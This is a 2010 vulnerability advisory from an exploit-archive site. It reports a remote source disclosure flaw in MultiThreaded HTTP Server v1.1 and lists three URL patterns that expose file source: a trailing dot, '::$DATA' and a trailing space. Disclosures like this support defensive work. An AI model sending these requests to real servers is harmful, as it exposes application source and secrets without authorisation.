MultiThreaded HTTP Server v1.1 Source Disclosure

2010.04.21

Credit: Dr_IDE

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

################################################################
#
# Exploit Title: MultiThreaded HTTP Server v1.1 Source Disclosure
# Found By: Dr_IDE
# Date: Apr. 20, 2010
# Download: http://voxel.dl.sourceforge.net/project/http/version1.1/%5BUnnamed%20release%5D/HTTPProject_fat.jar
# Tested on: Windows 7
#
################################################################
- Description -
MultiThreaded HTTP Server v1.1 is a Java based HTTP server. This is the latest
version of the application available.
MultiThreaded HTTP Server is vulnerable to remote source disclosure attacks.
- Technical Details -
http://[ webserver IP][:port]/[ file ][.]
http://[ webserver IP][:port]/[ file ][::$DATA]
http://[ webserver IP][:port]/[space] (Weird, only works for default index page)
#[pocoftheday.blogspot.com]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MultiThreaded HTTP Server v1.1 Source Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.